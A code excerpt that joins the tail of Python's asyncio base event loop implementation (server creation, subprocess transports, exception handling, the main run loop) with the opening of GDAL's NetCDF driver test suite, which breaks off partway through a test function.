(remote_addr and addr_pair[1] is None))]
if not addr_pairs_info:
raise ValueError('can not get address information')
exceptions = []
for ((family, proto),
(local_address, remote_address)) in addr_pairs_info:
sock = None
r_addr = None
try:
sock = socket.socket(
family=family, type=socket.SOCK_DGRAM, proto=proto)
if reuse_port:
_set_reuseport(sock)
if allow_broadcast:
sock.setsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.setblocking(False)
if local_addr:
sock.bind(local_address)
if remote_addr:
if not allow_broadcast:
await self.sock_connect(sock, remote_address)
r_addr = remote_address
except OSError as exc:
if sock is not None:
sock.close()
exceptions.append(exc)
except:
if sock is not None:
sock.close()
raise
else:
break
else:
raise exceptions[0]
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_datagram_transport(
sock, protocol, r_addr, waiter)
if self._debug:
if local_addr:
logger.info("Datagram endpoint local_addr=%r remote_addr=%r "
"created: (%r, %r)",
local_addr, remote_addr, transport, protocol)
else:
logger.debug("Datagram endpoint remote_addr=%r created: "
"(%r, %r)",
remote_addr, transport, protocol)
try:
await waiter
except:
transport.close()
raise
return transport, protocol
async def _ensure_resolved(self, address, *,
family=0, type=socket.SOCK_STREAM,
proto=0, flags=0, loop):
host, port = address[:2]
info = _ipaddr_info(host, port, family, type, proto, *address[2:])
if info is not None:
# "host" is already a resolved IP.
return [info]
else:
return await loop.getaddrinfo(host, port, family=family, type=type,
proto=proto, flags=flags)
async def _create_server_getaddrinfo(self, host, port, family, flags):
infos = await self._ensure_resolved((host, port), family=family,
type=socket.SOCK_STREAM,
flags=flags, loop=self)
if not infos:
raise OSError(f'getaddrinfo({host!r}) returned empty list')
return infos
async def create_server(
self, protocol_factory, host=None, port=None,
*,
family=socket.AF_UNSPEC,
flags=socket.AI_PASSIVE,
sock=None,
backlog=100,
ssl=None,
reuse_address=None,
reuse_port=None,
ssl_handshake_timeout=None,
start_serving=True):
"""Create a TCP server.
The host parameter can be a string, in that case the TCP server is
bound to host and port.
The host parameter can also be a sequence of strings and in that case
the TCP server is bound to all hosts of the sequence. If a host
appears multiple times (possibly indirectly e.g. when hostnames
resolve to the same IP address), the server is only bound once to that
host.
Return a Server object which can be used to stop the service.
This method is a coroutine.
"""
if isinstance(ssl, bool):
raise TypeError('ssl argument must be an SSLContext or None')
if ssl_handshake_timeout is not None and ssl is None:
raise ValueError(
'ssl_handshake_timeout is only meaningful with ssl')
if host is not None or port is not None:
if sock is not None:
raise ValueError(
'host/port and sock can not be specified at the same time')
if reuse_address is None:
reuse_address = os.name == "posix" and sys.platform != "cygwin"
sockets = []
if host == '':
hosts = [None]
elif (isinstance(host, str) or
not isinstance(host, collections.abc.Iterable)):
hosts = [host]
else:
hosts = host
fs = [self._create_server_getaddrinfo(host, port, family=family,
flags=flags)
for host in hosts]
infos = await tasks.gather(*fs)
infos = set(itertools.chain.from_iterable(infos))
completed = False
try:
for res in infos:
af, socktype, proto, canonname, sa = res
try:
sock = socket.socket(af, socktype, proto)
except socket.error:
# Assume it's a bad family/type/protocol combination.
if self._debug:
logger.warning('create_server() failed to create '
'socket.socket(%r, %r, %r)',
af, socktype, proto, exc_info=True)
continue
sockets.append(sock)
if reuse_address:
sock.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
if reuse_port:
_set_reuseport(sock)
# Disable IPv4/IPv6 dual stack support (enabled by
# default on Linux) which makes a single socket
# listen on both address families.
if (_HAS_IPv6 and
af == socket.AF_INET6 and
hasattr(socket, 'IPPROTO_IPV6')):
sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_V6ONLY,
True)
try:
sock.bind(sa)
except OSError as err:
raise OSError(err.errno, 'error while attempting '
'to bind on address %r: %s'
% (sa, err.strerror.lower())) from None
completed = True
finally:
if not completed:
for sock in sockets:
sock.close()
else:
if sock is None:
raise ValueError('Neither host/port nor sock were specified')
if sock.type != socket.SOCK_STREAM:
raise ValueError(f'A Stream Socket was expected, got {sock!r}')
sockets = [sock]
for sock in sockets:
sock.setblocking(False)
server = Server(self, sockets, protocol_factory,
ssl, backlog, ssl_handshake_timeout)
if start_serving:
server._start_serving()
# Skip one loop iteration so that all 'loop.add_reader'
# go through.
await tasks.sleep(0)
if self._debug:
logger.info("%r is serving", server)
return server
async def connect_accepted_socket(
self, protocol_factory, sock,
*, ssl=None,
ssl_handshake_timeout=None):
if sock.type != socket.SOCK_STREAM:
raise ValueError(f'A Stream Socket was expected, got {sock!r}')
if ssl_handshake_timeout is not None and not ssl:
raise ValueError(
'ssl_handshake_timeout is only meaningful with ssl')
transport, protocol = await self._create_connection_transport(
sock, protocol_factory, ssl, '', server_side=True,
ssl_handshake_timeout=ssl_handshake_timeout)
if self._debug:
# Get the socket from the transport because SSL transport closes
# the old socket and creates a new SSL socket
sock = transport.get_extra_info('socket')
logger.debug("%r handled: (%r, %r)", sock, transport, protocol)
return transport, protocol
async def connect_read_pipe(self, protocol_factory, pipe):
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_read_pipe_transport(pipe, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
if self._debug:
logger.debug('Read pipe %r connected: (%r, %r)',
pipe.fileno(), transport, protocol)
return transport, protocol
async def connect_write_pipe(self, protocol_factory, pipe):
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_write_pipe_transport(pipe, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
if self._debug:
logger.debug('Write pipe %r connected: (%r, %r)',
pipe.fileno(), transport, protocol)
return transport, protocol
def _log_subprocess(self, msg, stdin, stdout, stderr):
info = [msg]
if stdin is not None:
info.append(f'stdin={_format_pipe(stdin)}')
if stdout is not None and stderr == subprocess.STDOUT:
info.append(f'stdout=stderr={_format_pipe(stdout)}')
else:
if stdout is not None:
info.append(f'stdout={_format_pipe(stdout)}')
if stderr is not None:
info.append(f'stderr={_format_pipe(stderr)}')
logger.debug(' '.join(info))
async def subprocess_shell(self, protocol_factory, cmd, *,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=False,
shell=True, bufsize=0,
encoding=None, errors=None, text=None,
**kwargs):
if not isinstance(cmd, (bytes, str)):
raise ValueError("cmd must be a string")
if universal_newlines:
raise ValueError("universal_newlines must be False")
if not shell:
raise ValueError("shell must be True")
if bufsize != 0:
raise ValueError("bufsize must be 0")
if text:
raise ValueError("text must be False")
if encoding is not None:
raise ValueError("encoding must be None")
if errors is not None:
raise ValueError("errors must be None")
protocol = protocol_factory()
debug_log = None
if self._debug:
# don't log parameters: they may contain sensitive information
# (password) and may be too long
debug_log = 'run shell command %r' % cmd
self._log_subprocess(debug_log, stdin, stdout, stderr)
transport = await self._make_subprocess_transport(
protocol, cmd, True, stdin, stdout, stderr, bufsize, **kwargs)
if self._debug and debug_log is not None:
logger.info('%s: %r', debug_log, transport)
return transport, protocol
async def subprocess_exec(self, protocol_factory, program, *args,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=False,
shell=False, bufsize=0,
encoding=None, errors=None, text=None,
**kwargs):
if universal_newlines:
raise ValueError("universal_newlines must be False")
if shell:
raise ValueError("shell must be False")
if bufsize != 0:
raise ValueError("bufsize must be 0")
if text:
raise ValueError("text must be False")
if encoding is not None:
raise ValueError("encoding must be None")
if errors is not None:
raise ValueError("errors must be None")
popen_args = (program,) + args
protocol = protocol_factory()
debug_log = None
if self._debug:
# don't log parameters: they may contain sensitive information
# (password) and may be too long
debug_log = f'execute program {program!r}'
self._log_subprocess(debug_log, stdin, stdout, stderr)
transport = await self._make_subprocess_transport(
protocol, popen_args, False, stdin, stdout, stderr,
bufsize, **kwargs)
if self._debug and debug_log is not None:
logger.info('%s: %r', debug_log, transport)
return transport, protocol
def get_exception_handler(self):
"""Return an exception handler, or None if the default one is in use.
"""
return self._exception_handler
def set_exception_handler(self, handler):
"""Set handler as the new event loop exception handler.
If handler is None, the default exception handler will
be set.
If handler is a callable object, it should have a
signature matching '(loop, context)', where 'loop'
will be a reference to the active event loop, 'context'
will be a dict object (see `call_exception_handler()`
documentation for details about context).
"""
if handler is not None and not callable(handler):
raise TypeError(f'A callable object or None is expected, '
f'got {handler!r}')
self._exception_handler = handler
def default_exception_handler(self, context):
"""Default exception handler.
This is called when an exception occurs and no exception
handler is set, and can be called by a custom exception
handler that wants to defer to the default behavior.
This default handler logs the error message and other
context-dependent information. In debug mode, a truncated
stack trace is also appended showing where the given object
(e.g. a handle or future or task) was created, if any.
The context parameter has the same meaning as in
`call_exception_handler()`.
"""
message = context.get('message')
if not message:
message = 'Unhandled exception in event loop'
exception = context.get('exception')
if exception is not None:
exc_info = (type(exception), exception, exception.__traceback__)
else:
exc_info = False
if ('source_traceback' not in context and
self._current_handle is not None and
self._current_handle._source_traceback):
context['handle_traceback'] = \
self._current_handle._source_traceback
log_lines = [message]
for key in sorted(context):
if key in {'message', 'exception'}:
continue
value = context[key]
if key == 'source_traceback':
tb = ''.join(traceback.format_list(value))
value = 'Object created at (most recent call last):\n'
value += tb.rstrip()
elif key == 'handle_traceback':
tb = ''.join(traceback.format_list(value))
value = 'Handle created at (most recent call last):\n'
value += tb.rstrip()
else:
value = repr(value)
log_lines.append(f'{key}: {value}')
logger.error('\n'.join(log_lines), exc_info=exc_info)
def call_exception_handler(self, context):
"""Call the current event loop's exception handler.
The context argument is a dict containing the following keys:
- 'message': Error message;
- 'exception' (optional): Exception object;
- 'future' (optional): Future instance;
- 'task' (optional): Task instance;
- 'handle' (optional): Handle instance;
- 'protocol' (optional): Protocol instance;
- 'transport' (optional): Transport instance;
- 'socket' (optional): Socket instance;
- 'asyncgen' (optional): Asynchronous generator that caused
the exception.
New keys maybe introduced in the future.
Note: do not overload this method in an event loop subclass.
For custom exception handling, use the
`set_exception_handler()` method.
"""
if self._exception_handler is None:
try:
self.default_exception_handler(context)
except (SystemExit, KeyboardInterrupt):
raise
except BaseException:
# Second protection layer for unexpected errors
# in the default implementation, as well as for subclassed
# event loops with overloaded "default_exception_handler".
logger.error('Exception in default exception handler',
exc_info=True)
else:
try:
self._exception_handler(self, context)
except (SystemExit, KeyboardInterrupt):
raise
except BaseException as exc:
# Exception in the user set custom exception handler.
try:
# Let's try default handler.
self.default_exception_handler({
'message': 'Unhandled error in exception handler',
'exception': exc,
'context': context,
})
except (SystemExit, KeyboardInterrupt):
raise
except BaseException:
# Guard 'default_exception_handler' in case it is
# overloaded.
logger.error('Exception in default exception handler '
'while handling an unexpected error '
'in custom exception handler',
exc_info=True)
def _add_callback(self, handle):
"""Add a Handle to _scheduled (TimerHandle) or _ready."""
assert isinstance(handle, events.Handle), 'A Handle is required here'
if handle._cancelled:
return
assert not isinstance(handle, events.TimerHandle)
self._ready.append(handle)
def _add_callback_signalsafe(self, handle):
"""Like _add_callback() but called from a signal handler."""
self._add_callback(handle)
self._write_to_self()
def _timer_handle_cancelled(self, handle):
"""Notification that a TimerHandle has been cancelled."""
if handle._scheduled:
self._timer_cancelled_count += 1
def _run_once(self):
"""Run one full iteration of the event loop.
This calls all currently ready callbacks, polls for I/O,
schedules the resulting callbacks, and finally schedules
'call_later' callbacks.
"""
sched_count = len(self._scheduled)
if (sched_count > _MIN_SCHEDULED_TIMER_HANDLES and
self._timer_cancelled_count / sched_count >
_MIN_CANCELLED_TIMER_HANDLES_FRACTION):
# Remove delayed calls that were cancelled if their number
# is too high
new_scheduled = []
for handle in self._scheduled:
if handle._cancelled:
handle._scheduled = False
else:
new_scheduled.append(handle)
heapq.heapify(new_scheduled)
self._scheduled = new_scheduled
self._timer_cancelled_count = 0
else:
# Remove delayed calls that were cancelled from head of queue.
while self._scheduled and self._scheduled[0]._cancelled:
self._timer_cancelled_count -= 1
handle = heapq.heappop(self._scheduled)
handle._scheduled = False
timeout = None
if self._ready or self._stopping:
timeout = 0
elif self._scheduled:
# Compute the desired timeout.
when = self._scheduled[0]._when
timeout = min(max(0, when - self.time()), MAXIMUM_SELECT_TIMEOUT)
event_list = self._selector.select(timeout)
self._process_events(event_list)
# Handle 'later' callbacks that are ready.
end_time = self.time() + self._clock_resolution
while self._scheduled:
handle = self._scheduled[0]
if handle._when >= end_time:
break
handle = heapq.heappop(self._scheduled)
handle._scheduled = False
self._ready.append(handle)
# This is the only place where callbacks are actually *called*.
# All other places just add them to ready.
# Note: We run all currently scheduled callbacks, but not any
# callbacks scheduled by callbacks run this time around --
# they will be run the next time (after another I/O poll).
# Use an idiom that is thread-safe without using locks.
ntodo = len(self._ready)
for i in range(ntodo):
handle = self._ready.popleft()
if handle._cancelled:
continue
if self._debug:
try:
self._current_handle = handle
t0 = self.time()
handle._run()
dt = self.time() - t0
if dt >= self.slow_callback_duration:
logger.warning('Executing %s took %.3f seconds',
_format_handle(handle), dt)
finally:
self._current_handle = None
else:
handle._run()
handle = None # Needed to break cycles when an exception occurs.
def _set_coroutine_origin_tracking(self, enabled):
if bool(enabled) == bool(self._coroutine_origin_tracking_enabled):
return
if enabled:
self._coroutine_origin_tracking_saved_depth = (
sys.get_coroutine_origin_tracking_depth())
sys.set_coroutine_origin_tracking_depth(
constants.DEBUG_STACK_DEPTH)
else:
sys.set_coroutine_origin_tracking_depth(
self._coroutine_origin_tracking_saved_depth)
self._coroutine_origin_tracking_enabled = enabled
def get_debug(self):
return self._debug
def set_debug(self, enabled):
self._debug = enabled
if self.is_running():
self.call_soon_threadsafe(self._set_coroutine_origin_tracking, enabled)
|
netcdf.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# $Id$
#
# Project: GDAL/OGR Test Suite
# Purpose: Test NetCDF driver support.
# Author: Frank Warmerdam <warmerdam@pobox.com>
#
###############################################################################
# Copyright (c) 2007, Frank Warmerdam <warmerdam@pobox.com>
# Copyright (c) 2008-2013, Even Rouault <even dot rouault at mines-paris dot org>
# Copyright (c) 2010, Kyle Shannon <kyle at pobox dot com>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import os
import sys
import shutil
from osgeo import gdal
from osgeo import osr
sys.path.append( '../pymod' )
import gdaltest
import test_cli_utilities
###############################################################################
# Netcdf Functions
###############################################################################
###############################################################################
# Get netcdf version and test for supported files
def netcdf_setup():
gdaltest.netcdf_drv_version = 'unknown'
gdaltest.netcdf_drv_has_nc2 = False
gdaltest.netcdf_drv_has_nc4 = False
gdaltest.netcdf_drv_has_hdf4 = False
gdaltest.netcdf_drv_silent = False;
gdaltest.netcdf_drv = gdal.GetDriverByName( 'NETCDF' )
if gdaltest.netcdf_drv is None:
print('NOTICE: netcdf not supported, skipping checks')
return 'skip'
#get capabilities from driver
metadata = gdaltest.netcdf_drv.GetMetadata()
if metadata is None:
print('NOTICE: netcdf metadata not found, skipping checks')
return 'skip'
#netcdf library version "3.6.3" of Dec 22 2009 06:10:17 $
#netcdf library version 4.1.1 of Mar 4 2011 12:52:19 $
if 'NETCDF_VERSION' in metadata:
v = metadata['NETCDF_VERSION']
v = v[ 0 : v.find(' ') ].strip('"');
gdaltest.netcdf_drv_version = v
if 'NETCDF_HAS_NC2' in metadata \
and metadata['NETCDF_HAS_NC2'] == 'YES':
gdaltest.netcdf_drv_has_nc2 = True
if 'NETCDF_HAS_NC4' in metadata \
and metadata['NETCDF_HAS_NC4'] == 'YES':
gdaltest.netcdf_drv_has_nc4 = True
if 'NETCDF_HAS_HDF4' in metadata \
and metadata['NETCDF_HAS_HDF4'] == 'YES':
gdaltest.netcdf_drv_has_hdf4 = True
print( 'NOTICE: using netcdf version ' + gdaltest.netcdf_drv_version + \
' has_nc2: '+str(gdaltest.netcdf_drv_has_nc2)+' has_nc4: ' + \
str(gdaltest.netcdf_drv_has_nc4) )
return 'success'
###############################################################################
# test file copy
# helper function needed so we can call Process() on it from netcdf_test_copy_timeout()
def netcdf_test_copy( ifile, band, checksum, ofile, opts=[], driver='NETCDF' ):
test = gdaltest.GDALTest( 'NETCDF', '../'+ifile, band, checksum, options=opts )
return test.testCreateCopy(check_gt=0, check_srs=0, new_filename=ofile, delete_copy = 0, check_minmax = 0)
###############################################################################
#test file copy, optional timeout arg
def netcdf_test_copy_timeout( ifile, band, checksum, ofile, opts=[], driver='NETCDF', timeout=None ):
from multiprocessing import Process
result = 'success'
drv = gdal.GetDriverByName( driver )
if os.path.exists( ofile ):
drv.Delete( ofile )
if timeout is None:
result = netcdf_test_copy( ifile, band, checksum, ofile, opts, driver )
else:
sys.stdout.write('.')
sys.stdout.flush()
proc = Process( target=netcdf_test_copy, args=(ifile, band, checksum, ofile, opts ) )
proc.start()
proc.join( timeout )
# if proc is alive after timeout we must terminate it, and return fail
# valgrind detects memory leaks when this occurs (although it should never happen)
if proc.is_alive():
proc.terminate()
if os.path.exists( ofile ):
drv.Delete( ofile )
print('testCreateCopy() for file %s has reached timeout limit of %d seconds' % (ofile, timeout) )
result = 'fail'
return result
###############################################################################
#check support for DEFLATE compression, requires HDF5 and zlib
def netcdf_test_deflate( ifile, checksum, zlevel=1, timeout=None ):
try:
from multiprocessing import Process
except:
print('from multiprocessing import Process failed')
return 'skip'
if gdaltest.netcdf_drv is None:
return 'skip'
if not gdaltest.netcdf_drv_has_nc4:
return 'skip'
ofile1 = 'tmp/' + os.path.basename(ifile) + '-1.nc'
ofile1_opts = [ 'FORMAT=NC4C', 'COMPRESS=NONE']
ofile2 = 'tmp/' + os.path.basename(ifile) + '-2.nc'
ofile2_opts = [ 'FORMAT=NC4C', 'COMPRESS=DEFLATE', 'ZLEVEL='+str(zlevel) ]
if not os.path.exists( ifile ):
gdaltest.post_reason( 'ifile %s does not exist' % ifile )
return 'fail'
result1 = netcdf_test_copy_timeout( ifile, 1, checksum, ofile1, ofile1_opts, 'NETCDF', timeout )
result2 = netcdf_test_copy_timeout( ifile, 1, checksum, ofile2, ofile2_opts, 'NETCDF', timeout )
if result1 == 'fail' or result2 == 'fail':
return 'fail'
# make sure compressed file is smaller than uncompressed files
try:
size1 = os.path.getsize( ofile1 )
size2 = os.path.getsize( ofile2 )
except:
gdaltest.post_reason( 'Error getting file sizes.' )
return 'fail'
if size2 >= size1:
gdaltest.post_reason( 'Compressed file is not smaller than reference, check your netcdf-4, HDF5 and zlib installation' )
return 'fail'
return 'success'
###############################################################################
# check support for reading attributes (single values and array values)
def netcdf_check_vars( ifile, vals_global=None, vals_band=None ):
src_ds = gdal.Open( ifile )
if src_ds is None:
gdaltest.post_reason( 'could not open dataset ' + ifile )
return 'fail'
metadata_global = src_ds.GetMetadata()
if metadata_global is None:
gdaltest.post_reason( 'could not get global metadata from ' + ifile )
return 'fail'
missval = src_ds.GetRasterBand(1).GetNoDataValue()
if missval != 1:
gdaltest.post_reason( 'got invalid nodata value %s for Band' % str(missval) )
return 'fail'
metadata_band = src_ds.GetRasterBand(1).GetMetadata()
if metadata_band is None:
gdaltest.post_reason( 'could not get Band metadata' )
return 'fail'
metadata = metadata_global
vals = vals_global
if vals is None:
vals = dict()
for k, v in vals.items():
if not k in metadata:
gdaltest.post_reason("missing metadata [%s]" % (str(k)))
return 'fail'
# strip { and } as new driver uses these for array values
mk = metadata[k].lstrip('{ ').rstrip('} ')
if mk != v:
gdaltest.post_reason("invalid value [%s] for metadata [%s]=[%s]" \
% (str(mk),str(k),str(v)))
return 'fail'
metadata = metadata_band
vals = vals_band
if vals is None:
vals = dict()
for k, v in vals.items():
if not k in metadata:
gdaltest.post_reason("missing metadata [%s]" % (str(k)))
return 'fail'
# strip { and } as new driver uses these for array values
mk = metadata[k].lstrip('{ ').rstrip('} ')
if mk != v:
gdaltest.post_reason("invalid value [%s] for metadata [%s]=[%s]" \
% (str(mk),str(k),str(v)))
return 'fail'
return 'success'
###############################################################################
# Netcdf Tests
###############################################################################
###############################################################################
# Perform simple read test.
def netcdf_1():
#setup netcdf environment
netcdf_setup()
if gdaltest.netcdf_drv is None:
return 'skip'
tst = gdaltest.GDALTest( 'NetCDF', 'NETCDF:"data/bug636.nc":tas', 1, 31621,
filename_absolute = 1 )
# We don't want to gum up the test stream output with the
# 'Warning 1: No UNIDATA NC_GLOBAL:Conventions attribute' message.
gdal.PushErrorHandler( 'CPLQuietErrorHandler' )
result = tst.testOpen()
gdal.PopErrorHandler()
return result
###############################################################################
# Verify a simple createcopy operation. We can't do the trivial gdaltest
# operation because the new file will only be accessable via subdatasets!
def netcdf_2():
if gdaltest.netcdf_drv is None:
return 'skip'
src_ds = gdal.Open( 'data/byte.tif' )
base_ds = gdaltest.netcdf_drv.CreateCopy( 'tmp/netcdf2.nc', src_ds)
base_ds = None
tst = gdaltest.GDALTest( 'NetCDF', 'tmp/netcdf2.nc',
1, 4672,
filename_absolute = 1 )
wkt = """PROJCS["NAD27 / UTM zone 11N",
GEOGCS["NAD27",
DATUM["North_American_Datum_1927",
SPHEROID["Clarke 1866",6378206.4,294.9786982139006,
AUTHORITY["EPSG","7008"]],
AUTHORITY["EPSG","6267"]],
PRIMEM["Greenwich",0],
UNIT["degree",0.0174532925199433],
AUTHORITY["EPSG","4267"]],
PROJECTION["Transverse_Mercator"],
PARAMETER["latitude_of_origin",0],
PARAMETER["central_meridian",-117],
PARAMETER["scale_factor",0.9996],
PARAMETER["false_easting",500000],
PARAMETER["false_northing",0],
UNIT["metre",1,
AUTHORITY["EPSG","9001"]],
AUTHORITY["EPSG","26711"]]"""
result = tst.testOpen( check_prj = wkt )
if result != 'success':
return result
gdaltest.clean_tmp()
return 'success'
###############################################################################
def netcdf_3():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open( 'data/sombrero.grd' )
bnd = ds.GetRasterBand(1)
minmax = bnd.ComputeRasterMinMax()
if abs(minmax[0] - (-0.675758)) > 0.000001 or abs(minmax[1] - 1.0) > 0.000001:
gdaltest.post_reason( 'Wrong min or max.' )
return 'fail'
bnd = None
ds = None
return 'success'
###############################################################################
# In #2582 5dimensional files were causing problems. Verify use ok.
def netcdf_4():
if gdaltest.netcdf_drv is None:
return 'skip'
tst = gdaltest.GDALTest( 'NetCDF',
'NETCDF:data/foo_5dimensional.nc:temperature',
3, 1218, filename_absolute = 1 )
# We don't want to gum up the test stream output with the
# 'Warning 1: No UNIDATA NC_GLOBAL:Conventions attribute' message.
gdal.PushErrorHandler( 'CPLQuietErrorHandler' )
#don't test for checksum (see bug #4284)
result = tst.testOpen(skip_checksum = True)
gdal.PopErrorHandler()
return result
###############################################################################
# In #2583 5dimensional files were having problems unrolling the highest
# dimension - check handling now on band 7.
def netcdf_5():
if gdaltest.netcdf_drv is None:
return 'skip'
tst = gdaltest.GDALTest( 'NetCDF',
'NETCDF:data/foo_5dimensional.nc:temperature',
7, 1227, filename_absolute = 1 )
# We don't want to gum up the test stream output with the
# 'Warning 1: No UNIDATA NC_GLOBAL:Conventions attribute' message.
gdal.PushErrorHandler( 'CPLQuietErrorHandler' )
#don't test for checksum (see bug #4284)
result = tst.testOpen(skip_checksum = True)
gdal.PopErrorHandler()
return result
###############################################################################
#ticket #3324 check spatial reference reading for cf-1.4 lambert conformal
#1 standard parallel.
def netcdf_6():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open( 'data/cf_lcc1sp.nc' )
prj = ds.GetProjection( )
sr = osr.SpatialReference( )
sr.ImportFromWkt( prj )
lat_origin = sr.GetProjParm( 'latitude_of_origin' )
if lat_origin != 25:
gdaltest.post_reason( 'Latitude of origin does not match expected:\n%f'
% lat_origin )
return 'fail'
ds = None
return 'success'
###############################################################################
#ticket #3324 check spatial reference reading for cf-1.4 lambert conformal
#2 standard parallels.
def netcdf_7():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open( 'data/cf_lcc2sp.nc' )
prj = ds.GetProjection( )
sr = osr.SpatialReference( )
sr.ImportFromWkt( prj )
std_p1 = sr.GetProjParm( 'standard_parallel_1' )
std_p2 = sr.GetProjParm( 'standard_parallel_2' )
if std_p1 != 33.0 or std_p2 != 45.0:
gdaltest.post_reason( 'Standard Parallels do not match expected:\n%f,%f'
% ( std_p1, std_p2 ) )
return 'fail'
ds = None
sr = None
return 'success'
###############################################################################
#check for cf convention read of albers equal area
# Previous version compared entire wkt, which varies slightly among driver versions
# now just look for PROJECTION=Albers_Conic_Equal_Area and some parameters
def netcdf_8():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open( 'data/cf_aea2sp_invf.nc' )
srs = osr.SpatialReference( )
srs.ImportFromWkt( ds.GetProjection( ) )
proj = srs.GetAttrValue( 'PROJECTION' )
if proj != 'Albers_Conic_Equal_Area':
gdaltest.post_reason( 'Projection does not match expected : ' + proj )
return 'fail'
param = srs.GetProjParm('latitude_of_center')
if param != 37.5:
gdaltest.post_reason( 'Got wrong parameter value (%g)' % param )
return 'fail'
param = srs.GetProjParm('longitude_of_center')
if param != -96:
gdaltest.post_reason( 'Got wrong parameter value (%g)' % param )
return 'fail'
ds = None
return 'success'
###############################################################################
#check to see if projected systems default to wgs84 if no spheroid def
def netcdf_9():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open( 'data/cf_no_sphere.nc' )
prj = ds.GetProjection( )
sr = osr.SpatialReference( )
sr.ImportFromWkt( prj )
spheroid = sr.GetAttrValue( 'SPHEROID' )
if spheroid != 'WGS 84':
gdaltest.post_reason( 'Incorrect spheroid read from file\n%s'
% ( spheroid ) )
return 'fail'
ds = None
sr = None
return 'success'
###############################################################################
#check if km pixel size makes it through to gt
def netcdf_10():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open( 'data/cf_no_sphere.nc' )
prj = ds.GetProjection( )
gt = ds.GetGeoTransform( )
gt1 = ( -1897186.0290038721, 5079.3608398440065,
0.0,2674684.0244560046,
0.0,-5079.4721679684635 )
gt2 = ( -1897.186029003872, 5.079360839844003,
0.0, 2674.6840244560044,
0.0,-5.079472167968456 )
if gt != gt1:
sr = osr.SpatialReference()
sr.ImportFromWkt( prj )
#new driver uses UNIT vattribute instead of scaling values
if not (sr.GetAttrValue("PROJCS|UNIT",1)=="1000" and gt == gt2) :
gdaltest.post_reason( 'Incorrect geotransform, got '+str(gt) )
return 'fail'
ds = None
return 'success'
###############################################################################
#check if ll gets caught in km pixel size check
def netcdf_11():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open( 'data/cf_geog.nc' )
gt = ds.GetGeoTransform( )
if gt != (-0.5, 1.0, 0.0, 10.5, 0.0, -1.0):
gdaltest.post_reason( 'Incorrect geotransform' )
return 'fail'
ds = None
return 'success'
###############################################################################
#check for scale/offset set/get.
def netcdf_12():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open( 'data/scale_offset.nc' )
scale = ds.GetRasterBand( 1 ).GetScale();
offset = ds.GetRasterBand( 1 ).GetOffset()
if scale != 0.01 or offset != 1.5:
gdaltest.post_reason( 'Incorrect scale(%f) or offset(%f)' % ( scale, offset ) )
return 'fail'
ds = None
return 'success'
###############################################################################
#check for scale/offset = 1.0/0.0 if no scale or offset is available
def netcdf_13():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open( 'data/no_scale_offset.nc' )
scale = ds.GetRasterBand( 1 ).GetScale();
offset = ds.GetRasterBand( 1 ).GetOffset()
if scale != 1.0 or offset != 0.0:
gdaltest.post_reason( 'Incorrect scale or offset' )
return 'fail'
ds = None
return 'success'
###############################################################################
#check for scale/offset for two variables
def netcdf_14():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open( 'NETCDF:data/two_vars_scale_offset.nc:z' )
scale = ds.GetRasterBand( 1 ).GetScale();
offset = ds.GetRasterBand( 1 ).GetOffset()
if scale != 0.01 or offset != 1.5:
gdaltest.post_reason( 'Incorrect scale(%f) or offset(%f)' % ( scale, offset ) )
return 'fail'
ds = None
ds = gdal.Open( 'NETCDF:data/two_vars_scale_offset.nc:q' )
scale = ds.GetRasterBand( 1 ).GetScale();
offset = ds.GetRasterBand( 1 ).GetOffset()
scale = ds.GetRasterBand( 1 ).GetScale();
offset = ds.GetRasterBand( 1 ).GetOffset()
if scale != 0.1 or offset != 2.5:
gdaltest.post_reason( 'Incorrect scale(%f) or offset(%f)' % ( scale, offset ) )
return 'fail'
return 'success'
###############################################################################
#check support for netcdf-2 (64 bit)
# This test fails in 1.8.1, because the driver does not support NC2 (bug #3890)
def netcdf_15():
if gdaltest.netcdf_drv is None:
return 'skip'
if gdaltest.netcdf_drv_has_nc2:
ds = gdal.Open( 'data/trmm-nc2.nc' )
if ds is None:
return 'fail'
else:
ds = None
return 'success'
else:
return 'skip'
return 'success'
###############################################################################
#check support for netcdf-4
def netcdf_16():
if gdaltest.netcdf_drv is None:
return 'skip'
ifile = 'data/trmm-nc4.nc'
if gdaltest.netcdf_drv_has_nc4:
# test with Open()
ds = gdal.Open( ifile )
if ds is None:
